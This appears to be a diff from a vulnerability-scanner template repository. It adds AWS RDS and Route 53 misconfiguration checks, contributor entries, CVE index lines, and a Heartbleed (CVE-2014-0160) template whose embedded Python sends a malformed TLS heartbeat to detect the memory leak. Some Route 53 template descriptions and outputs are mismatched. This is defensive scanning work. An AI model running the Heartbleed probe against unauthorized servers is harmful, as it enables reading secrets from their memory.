tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --query 'DBInstances[*].DBInstanceIdentifier' --output json
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].BackupRetentionPeriod' --output json
matchers:
- type: word
words:
- '0'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Automated Backups is Disabled"'
# digest: 4a0a00473045022100e960fd3daad878cd4faf86f582d1342e6a36a537f38399cb0042886a3d251d8002204f10fa5ad530a97e5707b0d68d908ad39d633bb4fe198d1dc2d7eb4ecb8bfcd5:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-backtrack-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-backtrack-disabled
info:
name: AWS RDS Backtrack - Disabled
author: DhiyaneshDK
severity: low
description: |
Ensure that the Backtrack feature is enabled for your Amazon Aurora (with MySQL compatibility) database clusters in order to backtrack your clusters to a specific time, without using backups.
impact: |
Unable to quickly revert the database to a previous state, leading to longer recovery times in case of accidental changes or data corruption.
remediation: |
Enable Backtrack for the RDS instance through the AWS Management Console, CLI, or API, and configure the desired backtrack window to allow quick recovery.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/backtrack.html
- https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/AuroraMySQL.Managing.Backtrack.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql`].DBClusterIdentifier | []'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-clusters --region $region --db-cluster-identifier $dbcluster --query 'DBClusters[*].BacktrackWindow' --output json
matchers:
- type: word
words:
- '[]'
extractors:
- type: dsl
dsl:
- 'dbcluster + " AWS RDS Backtrack is Disabled"'
# digest: 4a0a004730450220349e0d8818f762bd8895283943b51ba39a783311a975f590505bc1a0d1d16411022100b2e94046d2f2a056565f3a5618b7787db61e08d94bc53e4b7ee064224f56124a:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-cluster-protection-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-cluster-protection-disabled
info:
name: RDS Cluster Deletion Protection - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that all your provisioned Amazon Aurora database clusters are protected from accidental deletion by having the Deletion Protection feature enabled at the Aurora cluster level.
impact: |
The RDS cluster can be accidentally deleted, leading to potential data loss and service disruption.
remediation: |
Enable deletion protection for the RDS cluster via the AWS Management Console, CLI, or API to prevent accidental deletion.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/cluster-deletion-protection.html
- https://aws.amazon.com/about-aws/whats-new/2018/09/amazon-rds-now-provides-database-deletion-protection/
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql`].DBClusterIdentifier | []'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-clusters --region $region --db-cluster-identifier $dbcluster --query 'DBClusters[*].DeletionProtection' --output json
matchers:
- type: word
words:
- 'false'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Cluster Deletion Protection is Disabled"'
# digest: 490a0046304402200739860f75125c05a20a0938ad2c851bf23e4a3ec2fc60607ebb2029aec85cc20220553d51f85cb4ffe450af721605d778bf0e121cf14e589cddabdcd07263038a01:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-copy-snap.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-copy-snap
info:
name: RDS Copy Tags to Snapshots - Disabled
author: DhiyaneshDK
severity: low
description: |
Ensure that your Amazon RDS database instances make use of the Copy Tags to Snapshots feature in order to allow tags set on your database instances to be automatically copied to any automated or manual database snapshots that are created from these RDS instances.
impact: |
Tags are not copied to snapshots, making it harder to track, manage, and identify snapshots for cost allocation, compliance, or organization.
remediation: |
Enable the "Copy Tags to Snapshots" option for the RDS instance in the AWS Management Console, CLI, or API to ensure that tags are automatically applied to any created snapshots.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/copy-tags-to-snapshot.html
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Tagging.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`postgres`].DBInstanceIdentifier | []'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].CopyTagsToSnapshot'
matchers:
- type: word
words:
- 'false'
extractors:
- type: dsl
dsl:
- '"Copy Tags To Snapshot is not enable for instance " + dbcluster'
# digest: 490a00463044022051022f479a0afd2afcaf9d9d367a89ea9ec98a164addc7348dfef195b6c5fbcd02205b2c561640b25055cd8ef27cb924f349dac20be3c13b32840c35835adcf6b48f:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-insights-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-insights-disabled
info:
name: RDS Performance Insights - Disabled
author: DhiyaneshDK
severity: low
description: |
Ensure that your Amazon RDS MySQL and PostgreSQL database instances have the Performance Insights feature enabled in order to allow you to obtain a better overview of your databases performance as well as help you to identify potential performance issues.
impact: |
Inability to monitor and analyze database performance metrics, making it harder to identify and resolve performance bottlenecks.
remediation: |
Enable Performance Insights for the RDS instance in the AWS Management Console or via CLI/API to monitor and analyze database performance metrics.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/performance-insights.html
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_PerfInsights.Enabling.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`aurora-mysql` || Engine==`aurora-postgresql` || Engine==`postgres`].DBInstanceIdentifier | []'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].PerformanceInsightsEnabled' --output json
matchers:
- type: word
words:
- 'false'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Performance Insights is Disabled"'
# digest: 490a00463044022076ed2cd39be2faa1af19918d6b51b7ebdc501bde23706e79e0b16ce01d9e91a5022047cf1a639be81999d86f0b95ee5d5abb9137cd19704e07fe687ac3ebe762c4ff:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-instance-autoscaling-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-instance-autoscaling-disabled
info:
name: RDS Instance Storage AutoScaling - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that the Storage AutoScaling feature is enabled for your Amazon RDS database instances in order to provide dynamic scaling support for the database's storage based on your RDS application needs.
impact: |
The RDS instance may run out of storage, leading to potential application downtime or performance degradation due to lack of disk space.
remediation: |
Enable storage autoscaling for the RDS instance in the AWS Management Console or via CLI/API to automatically adjust storage capacity as needed.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/enable-rds-storage-autoscaling.html
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_PIOPS.StorageTypes.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`postgres`].DBInstanceIdentifier | []'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].MaxAllocatedStorage' --output json
matchers:
- type: word
words:
- '[]'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Instance Storage AutoScaling is Disabled"'
# digest: 4a0a00473045022052cfa85782ba576ca83865f40047d55c219215742a8804975e05f2528f4ab6ff022100d0bd782a640c68eea072b5b0e95703bf0a7c6d85db7f3290592eac60a5ec440d:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-log-export-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-log-export-disabled
info:
name: RDS Log Exports - Disabled
author: DhiyaneshDK
severity: low
description: |
Ensure that your Amazon RDS database instances have the Log Exports feature enabled in order to publish database log events directly to CloudWatch Logs.
impact: |
Critical database logs are not exported, limiting visibility into performance issues, security events, and troubleshooting capabilities.
remediation: |
Enable RDS log exports in the AWS Management Console or via CLI/API by configuring the desired logs (e.g., slow query, general, error logs) for export to CloudWatch.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/log-exports.html
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output table --query 'DBInstances[?Engine==`mysql` || Engine==`aurora-mysql` || Engine==`mariadb`].DBInstanceIdentifier | []' --output json
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].EnabledCloudwatchLogsExports' --output json
matchers:
- type: word
words:
- '[]'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Log Exports is Disabled"'
# digest: 4b0a00483046022100b17bbb6881382beebcea1014f405102e2771bca097a08fc3702371e015c77fa102210086c211a7532e3e876f8f57aaed3fcea6a679b4d228fe1e9064c8e63c5828f48b:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-multi-az.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-multi-az
info:
name: RDS Multi-AZ - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that your Amazon RDS instances are using the Multi-AZ deployment configuration for high availability and automatic failover support, fully managed by AWS.
impact: |
The RDS instance lacks high availability and failover support, increasing the risk of downtime during instance failures or maintenance events.
remediation: |
Enable Multi-AZ deployment for the RDS instance in the AWS Management Console, CLI, or API to enhance availability and automatic failover.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/rds-multi-az.html
- http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].MultiAZ'
matchers:
- type: word
words:
- 'false'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Multi-AZ is Disabled"'
# digest: 490a004630440220429586da4f2e5d006e1a229969d4cecc4a3fcf3fe2af1e0611eb3fb11cf5b48e022056a5ab00af314086136ac8d8ac43055203a436f53f05a1f36abd2b8c8d9aabe7:922c64590222798bb761d5b6d8e72950

60
cloud/aws/rds/rds-public-access.yaml Normal file
View File

@ -0,0 +1,60 @@
id: rds-public-access
info:
name: RDS Publicly Accessible - Enabled
author: DhiyaneshDK
severity: high
description: |
Check for any public-facing Amazon RDS database instances provisioned within your AWS cloud account and restrict unauthorized access in order to minimize security risks.
impact: |
The RDS instance is exposed to the internet, increasing the risk of unauthorized access, attacks, and data breaches.
remediation: |
To restrict access to a publicly accessible database instance, you must disable the PubliclyAccessible configuration flag, and update the security group associated with the database instance.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/RDS/rds-publicly-accessible.html
- http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.html
tags: cloud,devops,aws,amazon,rds,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let DBClusterIdentifier of iterate(template.dbclusters)){
set("dbcluster", DBClusterIdentifier)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
extractors:
- type: json
name: dbclusters
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws rds describe-db-instances --region $region --db-instance-identifier $dbcluster --query 'DBInstances[*].PubliclyAccessible' --output json
matchers:
- type: word
words:
- 'true'
extractors:
- type: dsl
dsl:
- 'dbcluster + " RDS Publicly Accessible Enabled"'
# digest: 4b0a00483046022100d9e7638aebedfb54a1eda95f6d2d9baff969579b003a9471167303bac6816bc8022100e79a1be5210dfce91a16923d8aa5d154e592c9c50c9b3ea10317445c9a936006:922c64590222798bb761d5b6d8e72950

73
cloud/aws/route53/route53-dns-query-disabled.yaml Normal file
View File

@ -0,0 +1,73 @@
id: route53-dns-query-disabled
info:
name: DNS Query Logging for Route 53 Hosted Zones - Disabled
author: DhiyaneshDK
severity: medium
description: |
Domain Name System Security Extensions (DNSSEC) represents a set of protocols that adds a layer of security to the Domain Name System (DNS) lookup and exchange processes by enabling DNS responses to be validated.
impact: |
Disabling DNS query logging for Route 53 hosted zones prevents visibility into DNS queries, making it difficult to detect suspicious activity, troubleshoot issues, or analyze traffic patterns.
remediation: |
Enable DNS query logging in the Route 53 console for the hosted zone to capture and store DNS queries, allowing for better monitoring and analysis of DNS traffic.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Route53/enable-query-logging.html
- https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-overview.html
tags: cloud,devops,aws,amazon,route53,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let HostedZones of iterate(template.hostedzones)){
set("hostedzone", HostedZones)
code(2) && code(3)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws route53 list-hosted-zones --region $region --query "HostedZones[*].Id" --output json
extractors:
- type: json
name: hostedzones
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws route53 get-hosted-zone --id $hostedzone --query "HostedZone.Config.PrivateZone" --region $region --output json
matchers:
- type: word
words:
- 'false'
internal: true
- engine:
- sh
- bash
source: |
aws route53 list-query-logging-configs --hosted-zone-id "$hostedzone" --query "QueryLoggingConfigs" --region $region --output json
matchers:
- type: word
words:
- '[]'
extractors:
- type: dsl
dsl:
- 'hostedzone + " DNSSEC Signing for Route 53 Hosted Zones is Disabled"'
# digest: 490a004630440220018711c266d5989a927422b1f3ca48fc29633a1f997a417b68649c02d392537202206fa24b0f17b1b4b89e9e338369a021aafdb5191ada52d1e94b45ca50b2a0513f:922c64590222798bb761d5b6d8e72950

60
cloud/aws/route53/route53-dnssec-signing-disabled.yaml Normal file
View File

@ -0,0 +1,60 @@
id: route53-dnssec-signing-disabled
info:
name: DNSSEC Signing for Route 53 Hosted Zones - Disabled
author: DhiyaneshDK
severity: medium
description: |
Ensure that Domain Name System Security Extensions (DNSSEC) signing is enabled for your Amazon Route 53 public hosted zones in order to protect your domains against spoofing and cache poisoning attacks. By default, DNSSEC signing is not enabled for Route 53 hosted zones.
impact: |
Attackers can hijack the process of domain/IP lookup and redirect users to malicious web content through DNS hijacking and Man-In-The-Middle (MITM) attacks. DNSSEC security feature helps mitigate the risk of such attacks by encrypting signing DNS records.
remediation: |
Enable DNSSEC signing in the Route 53 console for the hosted zone, sign the zone with a strong key algorithm, and ensure all DNS records are published correctly.
reference:
- https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/Route53/enable-query-logging.html
- https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/monitoring-overview.html
tags: cloud,devops,aws,amazon,route53,aws-cloud-config
variables:
region: "us-west-2"
flow: |
code(1)
for(let HostedZones of iterate(template.hostedzones)){
set("hostedzone", HostedZones)
code(2)
}
self-contained: true
code:
- engine:
- sh
- bash
source: |
aws route53 list-hosted-zones --region $region --query "HostedZones[*].Id" --output json
extractors:
- type: json
name: hostedzones
internal: true
json:
- '.[]'
- engine:
- sh
- bash
source: |
aws route53 get-dnssec --region $region --hosted-zone-id "$hostedzone" --query "Status.ServeSignature" --output json
matchers:
- type: word
words:
- 'NOT_SIGNING'
extractors:
- type: dsl
dsl:
- 'hostedzone + " DNSSEC Signing for Route 53 Hosted Zones is Disabled"'
# digest: 4a0a004730450221009251d99374c677d15210c7aa3cbce5efc72564a59038b848eaf6bdb7130a3fd902200796026b32fc568c2b407a4c1ceb2b332b2ad8c77d2d71eee4d1f2917918e1f9:922c64590222798bb761d5b6d8e72950

138
code/cves/2014/CVE-2014-0160.yaml Normal file
View File

@ -0,0 +1,138 @@
id: CVE-2014-0160
info:
name: OpenSSL Heartbleed Vulnerability
author: pussycat0x
severity: high
description: |
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
reference:
- https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160
metadata:
verified: true
tags: cve,cve2014,openssl,heartbleed,code
variables:
url: "{{RootURL}}"
code:
- engine:
- py
- python3
source: |
import os
import struct
import socket
import time
import select
from urllib.parse import urlparse
def h2bin(x):
return bytes.fromhex(x.replace(' ', '').replace('\n', ''))
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = b''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, _, _ = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
return None, None, None
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return False
if typ == 24: # Heartbeat response
if len(pay) > 3:
print('server is vulnerable')
return True
return False
if typ == 21: # Server alert
return False
def main():
# Get the URL from the environment variable
url = os.getenv('url')
if not url:
print("URL environment variable is not set.")
return
# Parse the URL
parsed_url = urlparse(url)
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else 443
if not host:
return
# Create a socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Send Client Hello
s.send(hello)
# Wait for Server Hello
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
return
if typ == 22 and pay[0] == 0x0E: # Server hello done
break
# Send Heartbeat request and check vulnerability
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
matchers:
- type: dsl
dsl:
- "contains(response,'server is vulnerable')"
# digest: 4a0a00473045022100a35974b75f0aad0a597f631b6f8303609272c2d901e6cbfd379f733b6767a7470220538dc150435a3bc14d8a0746afdcf463b79a000740f5f314b7be5d9eae17273c:922c64590222798bb761d5b6d8e72950

34
contributors.json
View File

@ -1438,7 +1438,8 @@
"website": "https://pwn.by/noraj",
"email": ""
}
},{
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
@ -1447,5 +1448,36 @@
"website": "",
"email": ""
}
},
{
"author": "rxerium",
"links": {
"github": "https://www.github.com/rxerium",
"twitter": "https://twitter.com/rxerium",
"linkedin": "",
"website": "https://rxerium.com",
"email": "rishi@rxerium.com"
}
},
{
"author": "edoardottt",
"links": {
"github": "https://github.com/edoardottt",
"twitter": "https://twitter.com/edoardottt2",
"linkedin": "https://www.linkedin.com/in/edoardoottavianelli/",
"website": "https://edoardoottavianelli.it/",
"email": ""
}
},
{
"author": "jpg0mez",
"links": {
"github": "https://github.com/JPG0mez",
"twitter": "https://twitter.com/jpgp__",
"linkedin": "https://www.linkedin.com/in/juan-pablo-gomez-postigo-173a0b163/",
"website": "",
"email": ""
}
}
]

57
cves.json
View File

@ -317,6 +317,7 @@
{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"}
{"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"}
{"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"}
{"ID":"CVE-2015-8562","Info":{"Name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","Severity":"high","Description":"Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-8562.yaml"}
{"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"}
{"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"}
@ -376,6 +377,7 @@
{"ID":"CVE-2016-7834","Info":{"Name":"Sony IPELA Engine IP Camera - Hardcoded Account","Severity":"high","Description":"Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-7834.yaml"}
{"ID":"CVE-2016-7981","Info":{"Name":"SPIP \u003c3.1.2 - Cross-Site Scripting","Severity":"medium","Description":"SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-7981.yaml"}
{"ID":"CVE-2016-8527","Info":{"Name":"Aruba Airwave \u003c8.2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-8527.yaml"}
{"ID":"CVE-2016-9299","Info":{"Name":"Jenkins CLI - HTTP Java Deserialization","Severity":"critical","Description":"The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-9299.yaml"}
{"ID":"CVE-2017-0929","Info":{"Name":"DotNetNuke (DNN) ImageHandler \u003c9.2.0 - Server-Side Request Forgery","Severity":"high","Description":"DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-0929.yaml"}
{"ID":"CVE-2017-1000028","Info":{"Name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000028.yaml"}
{"ID":"CVE-2017-1000029","Info":{"Name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","Severity":"high","Description":"Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-1000029.yaml"}
@ -467,6 +469,7 @@
{"ID":"CVE-2017-5631","Info":{"Name":"KMCIS CaseAware - Cross-Site Scripting","Severity":"medium","Description":"KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-5631.yaml"}
{"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-5638.yaml"}
